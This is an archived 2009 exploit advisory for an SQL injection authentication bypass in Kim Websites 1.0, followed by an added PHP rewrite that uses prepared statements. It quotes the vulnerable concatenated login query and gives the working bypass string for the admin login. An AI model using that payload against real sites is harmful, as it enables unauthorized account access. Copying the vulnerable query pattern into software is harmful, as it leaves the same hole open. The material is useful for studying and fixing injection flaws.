Kim Websites 1.0 - Authentication Bypass

EDB-ID: 8209
Platform: PHP
Date: 2009-03-13

    	     ###############################################################
             #                                                             #
             #     Kim Websites 1.0 SQL Injection Vulnerability            #
             #                [ Authentication bypass]              	   #
             ###############################################################
Virangar Security Team
www.virangar.net
--------
Discovered By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all  hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
 -----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
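Added example, not part of the original advisory or of the Kim Websites code: a hardened form of the login.php lookup that passes the posted username only as a bound parameter. The function name find_active_user(), the PDO connection, the DSN and the credentials are assumptions made for illustration.

```php
<?php
// Added example: parameterized replacement for the concatenated query in login.php.
// Assumed (not from the original code): a PDO MySQL connection and the
// hypothetical helper name find_active_user().

function find_active_user(PDO $pdo, string $prefix, string $username,
                          string $password, int $now): ?array
{
    // Table names cannot be bound as parameters, so restrict the prefix to a
    // fixed character set before it is concatenated into the SQL text.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    // User input reaches the server only as bound values, so quotes and
    // comment markers in $username are compared as data, not parsed as SQL.
    $sql = "SELECT name, password FROM {$prefix}_users
            WHERE name = :name AND confirm = 1
              AND date2 > FROM_UNIXTIME(:now)";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':name', $username, PDO::PARAM_STR);
    $stmt->bindValue(':now', $now, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false) {
        return null; // no confirmed, unexpired account with this exact name
    }
    // md5() is kept only to match the existing password column; the hash is
    // compared in PHP with a constant-time check instead of inside the query.
    if (!hash_equals((string) $row['password'], md5($password))) {
        return null;
    }
    return $row;
}

// Usage with constructed connection values (placeholders, adjust locally).
$pdo = new PDO('mysql:host=localhost;dbname=kim;charset=utf8mb4',
               'kim_user', 'placeholder-password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use server-side prepared statements
]);
// The login string from the advisory is now matched literally against name.
$user = find_active_user($pdo, 'kim', "admin ' or 1=1/*", '', time());
var_dump($user);
```

Moving the stored hashes from md5() to password_hash() and password_verify() is a separate schema change that this example does not cover.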
Y0ung Ir4ni4n H4ck3rz

# milw0rm.com [2009-03-13]